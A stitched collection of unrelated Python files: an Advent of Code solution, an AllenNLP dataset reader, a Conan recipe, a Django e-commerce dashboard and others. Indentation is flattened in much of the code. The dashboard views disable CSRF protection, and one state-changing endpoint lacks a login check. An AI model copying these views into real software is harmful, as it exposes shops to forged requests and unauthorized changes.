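# while `{% blocktrans trimmed %}` or a single-line
# `{% blocktrans %}...{% endblocktrans %}` would not.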
def parse_args(argv=None):
parser = argparse.ArgumentParser()
parser.add_argument('filenames', nargs='*', help='Filenames to fix')
return parser.parse_args(argv)
if __name__ == '__main__':
exit(main())
|
from .caveat import Caveat
from .macaroon import Macaroon
from .macaroon import MACAROON_V1
from .macaroon import MACAROON_V2
from .verifier import Verifier
__all__ = [
'Macaroon',
'Caveat',
'Verifier',
'MACAROON_V1',
'MACAROON_V2'
]
__author__ = 'Evan Cordell'
__version__ = "0.13.0"
__version_info__ = tuple(__version__.split('.'))
__short_version__ = __version__
|
TEST = [(
"""
00100
11110
10110
10111
10101
01111
00111
11100
10000
11001
00010
01010
""",
198,
)]
TEST2 = [(
"""
00100
11110
10110
10111
10101
01111
00111
11100
10000
11001
00010
01010
""",
230,
)]
import sys
from pathlib import Path
from collections import defaultdict, Counter
import math
# import local AOC lib
sys.path.append(str(Path(__file__).parent.parent.parent))
import aoc
@aoc.submit(part=1)
@aoc.get_input
@aoc.tests(TEST)
@aoc.parse_text
def part_1(raw: str, ints: list[int], strs: list[str]):
    bit_counts = defaultdict(lambda: {"0": 0, "1": 0})
for line in strs:
for i, bit in enumerate(line):
bit_counts[i][bit] += 1
gr = ""
er = ""
for counts in bit_counts.values():
gr += "1" if counts["1"] > counts["0"] else "0"
er += "1" if counts["1"] < counts["0"] else "0"
return int(gr, 2) * int(er, 2)
@aoc.submit(part=2)
@aoc.get_input
@aoc.tests(TEST2)
@aoc.parse_text
def part_2(raw: str, ints: list[int], strs: list[str]):
oxy = strs
co2 = strs
for bit in range(len(strs[0])):
o = defaultdict(list)
c = defaultdict(list)
for n in oxy:
o[n[bit]].append(n)
for n in co2:
c[n[bit]].append(n)
if len(oxy) > 1:
oxy = o["1"] if len(o["1"]) >= len(o["0"]) else o["0"]
if len(co2) > 1:
co2 = c["0"] if len(c["1"]) >= len(c["0"]) else c["1"]
return int(oxy[0], 2) * int(co2[0], 2)
if __name__ == "__main__":
print("Part 1:", part_1(__file__))
print("Part 2:", part_2(__file__))
|
# -*- coding: utf-8 -*-
from setuptools import setup, Extension
packages = [
"swig_ex2",
]
ext_modules = [
Extension(
name="_swig_ex2",
sources=["ex2.c", "ex2_wrap.c"],
),
]
setup(
name="swig_ex2",
version="1.0.0",
description="SWIG Example2",
ext_modules=ext_modules,
packages=packages,
package_dir={"swig_ex2": ""},
)
|
import logging
import json
from typing import Dict, Any, Optional, List
from allennlp.common.file_utils import cached_path
from allennlp.common.checks import ConfigurationError
from allennlp.data.dataset_readers.dataset_reader import DatasetReader
from allennlp.data.token_indexers import TokenIndexer, SingleIdTokenIndexer
from allennlp.data.instance import Instance
from allennlp.data.tokenizers import Token
from allennlp.data.fields import TextField, MultiLabelField, MetadataField, Field
from overrides import overrides
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
@DatasetReader.register("emotion")
class EmotionDatasetReader(DatasetReader):
'''
    Dataset reader designed to read a JSON Lines file where each line is an
    object of the following type:
{"ID": "2017-En-21441",
"text": "\u201cWorry is a down payment on a problem you may never have'.
\u00a0Joyce Meyer. #motivation #leadership #worry",
"tokens": ["\u201c", "Worry", "is", "a", "down", "payment", "on", "a",
"problem", "you", "may", "never", "have", "'", ".", "Joyce",
"Meyer", ".", "#", "motivation", "#", "leadership", "#",
"worry"],
"labels": ["anticipation", "optimism", "trust"]}
    :returns: A ``Dataset`` of ``Instances`` for emotion classification.
'''
def __init__(self, lazy: bool = False,
token_indexers: Dict[str, TokenIndexer] = None) -> None:
super().__init__(lazy)
self._token_indexers = token_indexers or \
{"tokens": SingleIdTokenIndexer()}
@overrides
def _read(self, file_path: str):
# if `file_path` is a URL, redirect to the cache
file_path = cached_path(file_path)
with open(file_path, 'r') as emotion_file:
logger.info("Reading Emotion instances from jsonl dataset at: %s",
file_path)
for line in emotion_file:
example = json.loads(line)
example_instance: Dict[str, Any] = {}
multiple_emotion_labels = example["labels"]
tokens_ = example["tokens"]
# TextField requires ``Token`` objects
tokens = [Token(token) for token in tokens_]
example_instance['labels'] = multiple_emotion_labels
example_instance['tokens'] = tokens
example_instance['text'] = example["text"]
example_instance['ID'] = example['ID']
yield self.text_to_instance(**example_instance)
def text_to_instance(self, tokens: List[Token],
text: str, ID: Optional[str] = None,
labels: Optional[List[str]] = None) -> Instance:
'''
The tokens are expected to be pre-tokenised.
:param tokens: The text that has been tokenised
:param text: The text from the sample
:param ID: The ID of the sample
        :param labels: A list of labels (can be an empty list, which is
                       implicitly associated with the neutral class)
        :returns: An Instance object with all of the above encoded for a
                  PyTorch model.
'''
token_sequence = TextField(tokens, self._token_indexers)
instance_fields: Dict[str, Field] = {'tokens': token_sequence}
meta_fields = {}
meta_fields["words"] = [x.text for x in tokens]
meta_fields["text"] = text
if ID is not None:
meta_fields["ID"] = ID
instance_fields["metadata"] = MetadataField(meta_fields)
if labels is not None:
instance_fields['labels'] = MultiLabelField(labels,
label_namespace="labels")
return Instance(instance_fields)
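# Usage sketch (illustrative, assuming AllenNLP is installed and the data file
# follows the JSON Lines format documented above; the path is a placeholder):
#
#     reader = EmotionDatasetReader()
#     instances = reader.read("data/emotion_train.jsonl")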
|
from conans import ConanFile
import os
from conans.tools import download, unzip, check_sha256
from conans import CMake
class ArbitraryName(ConanFile):
name = "sso-23"
version = "2015.1.29"
branch = "master"
generators = "cmake"
license = "Boost"
url="http://github.com/TyRoXx/conan-sso-23"
ZIP_FOLDER_NAME = "SSO-23-533e88bb9f6e7f6023beeede2b00b0b0f3f6b4ae"
def source(self):
zip_name = "sso-23.zip"
download("https://github.com/elliotgoodrich/SSO-23/archive/533e88bb9f6e7f6023beeede2b00b0b0f3f6b4ae.zip", zip_name)
check_sha256(zip_name, "701b1d2396bf17b7d8473bab2f955a351603cd407db3626c2e5105ef209b6724")
unzip(zip_name)
os.unlink(zip_name)
def package(self):
self.copy("*.hpp", "include", "%s/include" % self.ZIP_FOLDER_NAME, keep_path=True)
|
_SCOPES = ["https://www.googleapis.com/auth/spreadsheets.readonly"]
# sample doc at: https://docs.google.com/spreadsheets/d/1X0wsfpb5-sm2PE4_dJDliBOrXIOzvVrYrA1JYeyS06c/edit?usp=sharing
_SPREADSHEET_ID = "1X0wsfpb5-sm2PE4_dJDliBOrXIOzvVrYrA1JYeyS06c"
_SHEET_NAME = "Sheet1"
_TEMPLATE_NAME = "template.pdf"
|
import csv
import io
import json
import random
import re
from django import http
from django.contrib import messages
from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import login_required, permission_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.core import exceptions
from django.core.mail import send_mail, send_mass_mail
from django.core.paginator import Paginator
from django.db import transaction as atomic_transactions
from django.db.models.expressions import F, Q
from django.shortcuts import get_object_or_404, redirect, render, reverse
from django.utils.decorators import method_decorator
from django.utils.html import mark_safe
from django.utils.translation import gettext_lazy as _
from django.views import generic
from django.views.decorators import http as views_decorators
from django.views.decorators.csrf import csrf_exempt
from dashboard import forms
from dashboard import models as dashboard_models
from shop import choices, models, serializers, utilities
MYUSER = get_user_model()
class IndexView(LoginRequiredMixin, generic.View):
def get(self, request, *args, **kwargs):
context = {
'carts_without_orders': models.Cart.statistics.carts_without_orders(),
'orders_count': models.CustomerOrder.statistics.total_count(),
'latest_orders': models.CustomerOrder.statistics.latest_orders(),
'revenue': models.CustomerOrder.statistics.revenue(),
'awaiting': models.CustomerOrder.statistics.awaiting_revenue(),
'refunded': models.CustomerOrder.statistics.total_refunded_orders()
}
return render(request, 'pages/home.html', context)
class ProductsView(LoginRequiredMixin, generic.ListView):
model = models.Product
queryset = models.Product.objects.all()
template_name = 'pages/lists/products.html'
context_object_name = 'products'
paginate_by = 10
def get(self, request, *args, **kwargs):
get_request = super().get(request, *args, **kwargs)
# This section resets the next_for_update in the
# session to prevent persistence when trying to
# return to the product page
previous_searched_terms = self.request.session.get('next_for_update')
if previous_searched_terms:
self.request.session.pop('next_for_update')
return get_request
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
paginator = Paginator(self.queryset, self.paginate_by)
page = self.request.GET.get('page')
products = paginator.get_page(page)
serialized_products = serializers.SimpleProductSerializer(
instance=products.object_list, many=True)
context['on_current_page'] = serialized_products.data
context['number_of_items'] = self.queryset.count()
return context
class SearchView(LoginRequiredMixin, generic.ListView):
model = models.Product
template_name = 'pages/lists/search/products.html'
context_object_name = 'products'
paginate_by = 10
def get_context_data(self, **kwargs):
context = super().get_context_data()
context['search'] = searched_term = self.request.GET.get('s')
self.request.session.update({'next_for_update': searched_term})
return context
def get_queryset(self):
searched_terms = self.request.GET.get('s')
return self.model.product_manager.advanced_search(searched_terms)
class CreateProductView(LoginRequiredMixin, generic.CreateView):
model = models.Product
queryset = models.Product.objects.all()
form_class = forms.CreateProductForm
template_name = 'pages/edit/create/product.html'
context_object_name = 'product'
def get_success_url(self):
return reverse('dashboard:products:home')
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['post_to_view'] = reverse('dashboard:products:create')
        # This toggles the appearance of certain
        # features on the update and creation
        # pages. For instance, unlinking an image
        # is not necessary during creation
context['vue_edit_mode'] = 'create'
return context
class UpdateProductView(LoginRequiredMixin, generic.UpdateView):
model = models.Product
template_name = 'pages/edit/update/product.html'
form_class = forms.UpdateProductForm
context_object_name = 'product'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
product = super().get_object()
context['post_to_view'] = reverse('dashboard:products:update', args=[product.id])
# If we clicked update from the search page,
# this method allows to return that same
# search page as opposed to all the products
context['return_to_search'] = self.request.session.get('next_for_update') or None
# This section allows the user
# to navigate from product to
        # product on the update page
        # with the <- and -> arrows
queryset = super().get_queryset()
queryset_list = list(queryset.values_list('id', flat=True))
queryset_list_length = len(queryset_list)
current_product_index = queryset_list.index(product.id)
next_product_index = current_product_index + 1
if next_product_index == queryset_list_length:
next_product_index = 0
context['disable_next'] = True
context['previous_product'] = reverse('dashboard:products:update', args=[queryset_list[current_product_index - 1]])
context['next_product'] = reverse('dashboard:products:update', args=[queryset_list[next_product_index]])
serialized_product = serializers.ProductSerializer(instance=product)
context['vue_product'] = serialized_product.data
images = models.Image.objects.all()
context['images'] = images = images.exclude(id__in=product.images.values_list('id'))
serialized_other_images = serializers.ImageSerializer(images, many=True)
context['vue_other_images'] = serialized_other_images.data
        # This toggles the appearance of certain
        # features on the update and creation
        # pages. For instance, unlinking an image
        # is not necessary during creation
context['vue_edit_mode'] = 'update'
context['vue_unlink_image_url'] = reverse('dashboard:products:unlink', args=[product.id])
return context
def get_success_url(self):
product = super().get_object()
return reverse('dashboard:products:update', args=[product.id])
class UsersView(LoginRequiredMixin, generic.ListView):
model = MYUSER
queryset = MYUSER.objects.all()
template_name = 'pages/lists/users.html'
context_object_name = 'users'
paginate_by = 10
class UserView(LoginRequiredMixin, generic.DetailView):
model = MYUSER
queryset = MYUSER.objects.all()
template_name = 'pages/edit/update/profile.html'
context_object_name = 'user'
def post(self, request, **kwargs):
user = super().get_object()
try:
user.email_user('subject', 'message', from_email='contact.mywebsite@gmail.com')
        except Exception:
messages.warning(request, "L'email n'a pas pu être envoyé", extra_tags='alert-warning')
else:
messages.success(request, f"Email envoyé à {user.email}", extra_tags='alert-success')
return redirect(reverse('dashboard_user', args=[user.id]))
class CustomerOrdersView(LoginRequiredMixin, generic.ListView):
"""Show all the orders made by customers
"""
model = models.CustomerOrder
queryset = models.CustomerOrder.objects.all()
template_name = 'pages/lists/orders.html'
context_object_name = 'orders'
paginate_by = 10
class CustomerOrderView(LoginRequiredMixin, generic.UpdateView):
"""Orders for one single product
"""
model = models.CustomerOrder
form_class = forms.CustomerOrderForm
template_name = 'pages/edit/update/order.html'
context_object_name = 'order'
def get_success_url(self):
order = super().get_object()
return reverse('dashboard:customer_order', args=[order.id])
class CartsView(LoginRequiredMixin, generic.ListView):
model = models.Cart
queryset = models.Cart.objects.all()
template_name = 'pages/lists/carts.html'
context_object_name = 'carts'
paginate_by = 5
class ImagesView(LoginRequiredMixin, generic.ListView):
model = models.Image
queryset = models.Image.objects.all()
template_name = 'pages/lists/images.html'
context_object_name = 'images'
paginate_by = 8
@atomic_transactions.atomic
def post(self, request, **kwargs):
authorized_methods = [
'from-url', 'from-local'
]
        method = request.POST.get('method')
        # Fallback message so messages.add_message() below always has a value,
        # e.g. for an unknown method or the unimplemented 'from-local' upload
        message = {
            'level': messages.ERROR,
            'message': _("Une erreur s'est produite - IMG-UP"),
            'extra_tags': 'alert-error'
        }
        if method:
if method in authorized_methods:
name = request.POST.get('new-image-name')
variant = request.POST.get('new-image-variant')
if not name:
message = {
'level': messages.ERROR,
'message': _("Vous devez attribuer un nom à votre image - IMG-UP"),
'extra_tags': 'alert-error'
}
else:
if method == 'from-url':
url = request.POST.get('new-image-link')
models.Image.objects.create(**{'name': name, 'url': url, 'variant': variant})
message = {
'level': messages.SUCCESS,
'message': _("Vos images ont été téléchargé"),
'extra_tags': 'alert-success'
}
elif method == 'from-local':
pass
messages.add_message(request, **message)
return redirect(reverse('dashboard:images:home'))
def get_context_data(self, **kwargs):
queryset = super().get_queryset()
context = super().get_context_data(**kwargs)
paginator = Paginator(queryset, self.paginate_by)
page = self.request.GET.get('page')
images = paginator.get_page(page)
serialized_images = serializers.ImageSerializer(images.object_list, many=True)
context['vue_images'] = serialized_images.data
return context
@method_decorator(atomic_transactions.atomic, name='post')
class ImageView(LoginRequiredMixin, generic.UpdateView):
model = models.Image
queryset = models.Image.objects.all()
form_class = forms.ImageForm
template_name = 'pages/edit/update/image.html'
context_object_name = 'image'
def get_success_url(self):
image = super().get_object()
return reverse('dashboard:images:update', args=[image.id])
class SettingsView(LoginRequiredMixin, generic.TemplateView):
template_name = 'pages/edit/update/settings/index.html'
# def get_context_data(self, **kwargs):
# context = super().get_context_data(**kwargs)
# user = self.request.user
# try:
# user_store = dashboard_models.DashboardSetting.objects.get(user=self.request.user)
# except:
# user_has_store = False
# else:
# user_has_store = True
# context['store'] = user_store
# context['user_has_store'] = user_has_store
# return context
class DashboardSettingsMixin:
def custom_post(self, request, redirect_url, form, **kwargs):
form = form(request.POST)
if form.errors:
messages.error(request, f'Le formulaire possède des erreurs: {[error for error in form.errors.keys()]}', extra_tags='alert-danger')
if form.is_valid():
item = dashboard_models.DashboardSetting.objects.filter(id=request.user.id)
item.update(**form.cleaned_data)
return redirect(reverse(redirect_url))
class GeneralSettingsView(LoginRequiredMixin, generic.View):
def get(self, request, *args, **kwargs):
user = request.user
setting = dashboard_models.DashboardSetting.objects.get(myuser=user)
context = {
'store': dashboard_models.DashboardSetting.objects.get(myuser=user),
'form': forms.DashboardSettingsForm(
initial={
'name': setting.name,
'legal_name': setting.legal_name,
'telephone': setting.telephone,
'contact_email': setting.contact_email,
'customer_care_email': setting.customer_care_email,
'automatic_archives': setting.automatic_archive
}
)
}
return render(request, 'pages/edit/update/settings/general.html', context)
def post(self, request, **kwargs):
form = forms.DashboardSettingsForm(request.POST)
if form.errors:
messages.error(request, f'Le formulaire possède des erreurs: {[error for error in form.errors.keys()]}', extra_tags='alert-danger')
if form.is_valid():
item = dashboard_models.DashboardSetting.objects.filter(id=request.user.id)
item.update(**form.cleaned_data)
return redirect(reverse('dashboard:settings:general'))
class StoreSettingsView(LoginRequiredMixin, generic.UpdateView):
model = dashboard_models.DashboardSetting
form_class = forms.DashboardSettingsForm
success_url = '/dashboard/settings'
context_object_name = 'store'
template_name = 'pages/edit/update/settings/shop.html'
class AnalyticsSettingsView(LoginRequiredMixin, DashboardSettingsMixin, generic.View):
def get(self, request, *args, **kwargs):
user = request.user
setting = dashboard_models.DashboardSetting.objects.get(myuser=user)
context = {
'store': dashboard_models.DashboardSetting.objects.get(myuser=user),
'form': forms.AnalyticsSettingsForm(
initial={
'google_analytics': setting.google_analytics,
'google_tag_manager': setting.google_tag_manager,
'google_optimize': setting.google_optimize,
'google_ads': setting.google_ads,
'facebook_pixels': setting.facebook_pixels,
'mailchimp': setting.mailchimp
}
)
}
return render(request, 'pages/edit/update/settings/analytics.html', context)
def post(self, request, **kwargs):
return self.custom_post(request, 'dashboard:settings:analytics', forms.AnalyticsSettingsForm, **kwargs)
class CouponsView(LoginRequiredMixin, generic.ListView):
model = models.Discount
queryset = models.Discount.objects.all()
template_name = 'pages/lists/coupons.html'
context_object_name = 'coupons'
class CreateCouponsView(LoginRequiredMixin, generic.CreateView):
model = models.Discount
form_class = forms.DiscountForm
queryset = models.Discount.objects.all()
template_name = 'pages/edit/create/coupon.html'
context_object_name = 'coupon'
class UpdateCouponsView(LoginRequiredMixin, generic.UpdateView):
model = models.Discount
form_class = forms.DiscountForm
queryset = models.Discount.objects.all()
template_name = 'pages/edit/update/coupon.html'
context_object_name = 'coupon'
def get_success_url(self):
coupon = super().get_object()
return reverse('dashboard:coupons:update', args=[coupon.id])
class CollectionsView(LoginRequiredMixin, generic.ListView):
model = models.ProductCollection
queryset = models.ProductCollection.objects.all()
template_name = 'pages/lists/collections.html'
context_object_name = 'collections'
paginate_by = 10
class CreateCollectionView(LoginRequiredMixin, generic.CreateView):
model = models.ProductCollection
form_class = forms.CollectionForm
template_name = 'pages/edit/create/collection.html'
context_object_name = 'collection'
success_url = '/dashboard/collections'
class UpdateCollectionView(LoginRequiredMixin, generic.UpdateView):
model = models.ProductCollection
form_class = forms.CollectionForm
template_name = 'pages/edit/update/collection.html'
context_object_name = 'collection'
def get_success_url(self):
product = super().get_object()
return reverse('dashboard:collections:update', args=[product.id])
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
second_conditions = [
{'id': i, 'name': condition[0]}
for i, condition in enumerate(choices.SecondConditionsChoices.choices)
]
context['vue_second_conditions'] = second_conditions
return context
class CreateCustomerView(LoginRequiredMixin, generic.CreateView):
model = MYUSER
form_class = forms.CustomerForm
template_name = 'pages/edit/create/customer.html'
context_object_name = 'customer'
class PurchaseOrderView(LoginRequiredMixin, generic.TemplateView):
template_name = 'pages/edit/create/purchase_order.html'
@csrf_exempt
@login_required
@atomic_transactions.atomic
@views_decorators.require_GET
def activate_coupon(request, **kwargs):
state = False
    # filter().first() returns None instead of raising DoesNotExist when the
    # coupon does not exist, so the else branch below is actually reachable
    coupon = models.Discount.objects.filter(id=kwargs['pk']).first()
    if coupon:
        coupon.active = not coupon.active
        coupon.save()
        state = True
message = {
'level': messages.SUCCESS,
'message': "Le coupon a été activé",
'extra_tags': 'alert-success'
}
else:
message = {
'level': messages.ERROR,
'message': "Une erreur s'est produite - COUP-AC",
'extra_tags': 'alert-danger'
}
messages.add_message(request, **message)
return http.JsonResponse(data={'state': state})
@csrf_exempt
@login_required
@views_decorators.require_POST
def upload_csv(request):
file = request.FILES
try:
data = file['newcsvfile']
    except Exception:
messages.error(request, "Une erreur s'est produite", extra_tags='alert-warning')
return http.JsonResponse({'state': False})
if not data.name.endswith('.csv'):
messages.error(request, "Le fichier doit être de type .csv", extra_tags='alert-warning')
return http.JsonResponse({'state': False})
messages.error(request, "Les produits ont été créés", extra_tags='alert-success')
return http.JsonResponse(data={'state': True})
@csrf_exempt
@login_required
@views_decorators.require_http_methods(['GET', 'POST'])
def download_csv(request):
authorized_exports = ['current', 'all', 'collection']
method = request.GET.get('method') or request.POST.get('method')
if method not in authorized_exports \
or not method:
messages.error(request, "Action non reconnue - EXP-C1", extra_tags='alert-danger')
        return http.JsonResponse(data={'state': False, 'code': 'EXP-C1'}, status=200)
authorized_exports_for = ['general', 'facebook']
export_for = request.GET.get('export_for')
if export_for not in authorized_exports_for:
messages.error(request, "Action non reconnue - EXP-C2", extra_tags='alert-danger')
        return http.JsonResponse(data={'state': False, 'code': 'EXP-C2'}, status=200)
facebook_headers = ['id', 'title', 'description', 'condition', 'availability',
'link', 'brand', 'price', 'image_link', 'google_product_category',
'gender', 'is_final_sale', 'return_policy_days', 'inventory']
    general_headers = ['id', 'name', 'description', 'price_ht', 'active']
    # Ensure `products` is always defined for the `if products:` check below,
    # even when no branch assigns it (e.g. a GET request with method 'current')
    products = None
    if request.GET:
if method == 'all':
products = models.Product.product_manager.filter(active=True)
elif method == 'collection':
name = request.GET.get('using')
if not name:
messages.error(request, "Collection non reconnue - EXP-C3", extra_tags='alert-warning')
                return http.JsonResponse(data={'state': False, 'code': 'EXP-C3'}, status=200)
else:
try:
products = models.ProductCollection.collection_manager.active_products(name)
                except Exception:
messages.error(request, "Collection non reconnue - EXP-C3", extra_tags='alert-warning')
                    return http.JsonResponse(data={'state': False, 'code': 'EXP-C3'}, status=200)
if request.POST:
if method == "current":
product_ids = request.POST.get('products')
try:
product_ids = product_ids.split(',')
            except Exception:
raise http.Http404()
else:
product_ids = [int(pk) for pk in product_ids]
if len(product_ids) == 0:
raise http.Http404()
products = models.Product.objects.filter(pk__in=product_ids)
if products:
if export_for == 'general':
headers = general_headers
if export_for == 'facebook':
headers = facebook_headers
rows = []
response = http.HttpResponse(content_type='text/csv')
csv_writer = csv.writer(response)
csv_writer.writerow(headers)
for product in products:
if export_for == 'general':
rows.append(
[
product.id,
product.name,
product.description,
product.price_ht,
product.active
]
)
if export_for == 'facebook':
url = f'https://namywebsitewoka.fr{product.get_absolute_url()}'
if product.gender == 'femme':
gender = 'female'
else:
gender = 'male'
rows.append(
[
product.id,
product.name,
product.description,
'new',
'in stock',
url,
'Nawoka',
product.get_price(),
product.get_main_image_url,
product.google_category,
gender,
False,
14,
50
]
)
csv_writer.writerows(rows)
response['Content-Disposition'] = 'inline; filename=products.csv'
return response
messages.error(request, "Les données n'ont pas pu être exportéù - EXP-CG", extra_tags='alert-warning')
return http.JsonResponse(data={'state': 'Failed'}, code=200)
@login_required
@atomic_transactions.atomic
@views_decorators.require_POST
def table_actions(request, **kwargs):
method = request.POST.get('method')
if not method or method == 'not-selected':
messages.error(request, "Actions non reconnue - TAB-AC", extra_tags='alert-danger')
return redirect(request.GET.get('next') or 'dashboard:home')
authorized_methods = [
'activate', 'deactivate', 'duplicate', 'delete', 'archive'
]
if method not in authorized_methods:
messages.error(request, "Actions non reconnue - TAB-AC", extra_tags='alert-danger')
return redirect(request.GET.get('next') or 'dashboard:home')
keys = request.POST.getlist('key')
if not keys:
messages.error(request, "Aucun éléments n'a été sélectionnés", extra_tags='alert-warning')
return redirect(request.GET.get('next') or 'dashboard:home')
products = models.Product.objects.filter(id__in=keys)
number_of_products = products.count()
if not products.exists():
messages.warning(request, "Aucun élément n'a été trouvé", extra_tags='alert-warning')
return redirect(request.GET.get('next') or 'dashboard:home')
if number_of_products > 1:
message_text = '{prefix} éléments ont été {suffix}s'
else:
message_text = '{prefix} élément a été {suffix}'
message = {
'level': messages.SUCCESS,
'extra_tags': 'alert-success'
}
if method == 'activate':
non_active_products = products.filter(active=False)
non_active_products.update(active=True)
message['message'] = message_text.format(prefix=number_of_products, suffix='activé')
if method == 'deactivate':
active_products = products.filter(active=True)
active_products.update(active=False)
message['message'] = message_text.format(prefix=number_of_products, suffix='désactivé')
if method == 'duplicate':
new_items = [
models.Product(
name=f'Copie de {product.name}',
active=False
) for product in products
]
models.Product.objects.bulk_create(new_items)
message['message'] = message_text.format(prefix=number_of_products, suffix='dupliqué')
if method == 'delete':
products.delete()
message['message'] = message_text.format(prefix=number_of_products, suffix='supprimé')
if method == 'archive':
message['message'] = message_text.format(prefix=number_of_products, suffix='archivé')
messages.add_message(request, **message)
return redirect(request.GET.get('next') or 'dashboard:home')
@login_required
@atomic_transactions.atomic
@views_decorators.require_GET
def delete_item_via_table(request, **kwargs):
"""
Delete an element from the database via a table
"""
method = kwargs['method']
if method == 'products':
item = get_object_or_404(models.Product, id=kwargs['pk'])
if method == 'carts':
item = get_object_or_404(models.Cart, id=kwargs['pk'])
# Check if the cart has orders and if so,
# mark them as terminated or completed
item.customerorder_set.all().update(completed=True)
item.delete()
url = f'dashboard:{method}:home'
if method == 'carts':
url = f'dashboard:carts'
page = request.GET.get('page')
url = reverse(url)
if page:
url = f'{url}?page={page}'
messages.success(request, f"L'élément a été supprimé", extra_tags='alert-success')
return redirect(url)
@login_required
@atomic_transactions.atomic
@views_decorators.require_GET
def delete_product(request, **kwargs):
"""
Delete a product from the update page
"""
item = get_object_or_404(models.Product, id=kwargs['pk'])
item.delete()
messages.success(
request, f"{item.name} a été supprimé", extra_tags='alert-success')
return redirect(request.GET.get('next') or 'dashboard:products:home')
@login_required
@views_decorators.require_POST
def duplicate_view(request, **kwargs):
state = False
try:
product = models.Product.objects.get(id=kwargs['pk'])
except:
messages.error(
request, "Le produit n'a pas pu être dupliqué - DUP-NE", extra_tags='alert-danger')
return http.JsonResponse(data={'state': state}, status=400)
base = {
'name': f'Copie de {product.name}',
'gender': product.gender,
'description': product.description,
'price_ht': product.price_ht,
'quantity': product.quantity,
'slug': f'copie-de-{product.slug}',
'collection': product.collection,
'discount_pct': product.discount_pct,
'discounted': product.discounted,
'private': product.private
}
try:
with atomic_transactions.atomic():
new_product = models.Product.objects.create(**base)
except:
messages.error(
request, "Le produit n'a pas pu être dupliqué - DUP-NP", extra_tags='alert-warning')
return http.JsonResponse(data={'state': state}, status=400)
else:
# Also associate all images from the original
# product with the new one
product_images = product.images.all()
if product_images.exists():
new_product.images.set(product_images)
messages.success(
request, f"{new_product.name} a été créer", extra_tags="alert-success")
return http.JsonResponse(data={'redirect_url': reverse('dashboard:products:update', args=[new_product.id])})
@login_required
@views_decorators.require_POST
def create_images(request, **kwargs):
method = request.POST.get('method')
if method == 'new':
images = []
data = request.POST.dict()
for _, value in data.items():
if value.endswith('.jpeg') or \
value.endswith('.jpg'):
images.append(value)
images_objects = []
for index, url in enumerate(images):
if index == 0:
images_objects.append(models.Image(url=url, main_image=True))
else:
images_objects.append(models.Image(url=url))
new_images = models.Image.objects.bulk_create(images_objects)
request.session['images_to_associate'] = [
image.id for image in new_images]
return http.JsonResponse(data={'status': 'Uploaded'})
if method == 'update':
product_id = request.POST.get('product')
product = get_object_or_404(models.Product, id=product_id)
return http.JsonResponse(data={'status': 'Uploaded'})
@login_required
@csrf_exempt
@views_decorators.require_POST
def associate_images(request, **kwargs):
product = models.Product.objects.get(id=kwargs['pk'])
images = request.POST.get('image')
if images:
    error = False
    try:
        # assumes the ids arrive as a comma-separated string, as elsewhere in this module
        image_ids = [int(pk) for pk in images.split(',')]
    except (TypeError, ValueError):
        error = True
    if error:
        messages.error(
            request, "Les images n'ont pas pu être associées - ASSO-ID", extra_tags='alert-warning')
        return http.JsonResponse(data={'state': False, })
    db_images = models.Image.objects.filter(id__in=image_ids)
    product.images.set(db_images)
    return http.JsonResponse(data={'state': True, })
messages.error(
    request, "Les images n'ont pas pu être associées - ASSO-ID", extra_tags='alert-warning')
return http.JsonResponse(data={'state': False, })
@csrf_exempt
@atomic_transactions.atomic
@views_decorators.require_POST
def unlink_image_on_product_page(request, **kwargs):
state = False
product_id = kwargs['pk']
image = request.POST.get('image')
editmode = request.POST.get('method')
editmodes = ['create', 'update']
if not editmode or editmode not in editmodes:
return http.JsonResponse(data={'state': False})
if not image:
messages.error(request, _("Une erreur s'est produite - IMG-UN"))
return http.JsonResponse(data={'state': state})
product = models.Product.objects.get(id=product_id)
image = models.Image.objects.get(id=image)
product.images.remove(image)
return http.JsonResponse(data={'state': state})
|
from .reply_server import Server
|
# Generated by Django 2.0.7 on 2018-07-30 06:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('question', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='attachment',
name='detail_id',
),
migrations.RemoveField(
model_name='attachment',
name='detail_type',
),
migrations.AddField(
model_name='question',
name='attachment_id',
field=models.IntegerField(blank=True, db_index=True, null=True, verbose_name='附件id'),
),
migrations.AlterField(
model_name='answer',
name='file',
field=models.FileField(blank=True, null=True, upload_to='uploads/answer/%Y/%m/%d', verbose_name='文件结果'),
),
migrations.AlterField(
model_name='attachment',
name='file_url',
field=models.FileField(blank=True, null=True, upload_to='uploads/question/%Y/%m/%d', verbose_name='文件结果'),
),
]
|
import asyncio # for concurrency
from poke_env.player.random_player import RandomPlayer
from poke_env.player.utils import cross_evaluate
from tabulate import tabulate
async def main():
"""Create a 3 random pokemon trainer bot to to fight against each other with random actions"""
# We create three random players - we do not train this player
players = [RandomPlayer(max_concurrent_battles=10) for _ in range(3)]
# Every player will play 20 games against every other player
cross_evaluation = await cross_evaluate(players, n_challenges=20)
# Defines a header for displaying results
table = [["-"] + [p.username for p in players]]
# Adds one line per player with corresponding results - the loop just builds the table
for p_1, results in cross_evaluation.items():
table.append([p_1] + [cross_evaluation[p_1][p_2] for p_2 in results])
# Displays results in a nicely formatted table.
print(tabulate(table))
if __name__ == "__main__":
asyncio.get_event_loop().run_until_complete(main())
|
# Infer the Encoder via pre-trained models. Before using this code, carefully set the args from line 171 (model type, path, image size and so on).
import os
import math
import torch
import torch.nn as nn
import torchvision
import model.E.E as BE
#import model.E.E_blur as BE # if use case 2 change above line
import model.E.E_PG as BE_PG
import model.E.E_BIG as BE_BIG
from model.utils.custom_adam import LREQAdam
import lpips
from metric.grad_cam import GradCAM, GradCamPlusPlus, GuidedBackPropagation, mask2cam
import tensorboardX
import numpy as np
import argparse
from model.stylegan1.net import Generator, Mapping #StyleGANv1
import model.stylegan2_generator as model_v2 #StyleGANv2
import model.pggan.pggan_generator as model_pggan #PGGAN
from model.biggan_generator import BigGAN #BigGAN
from model.utils.biggan_config import BigGANConfig
from training_utils import *
def train(tensor_writer = None, args = None):
type = args.mtype
model_path = args.checkpoint_dir_GAN
if type == 1: # StyleGAN1
Gs = Generator(startf=args.start_features, maxf=512, layer_count=int(math.log(args.img_size,2)-1), latent_size=512, channels=3)
Gs.load_state_dict(torch.load(model_path+'Gs_dict.pth'))
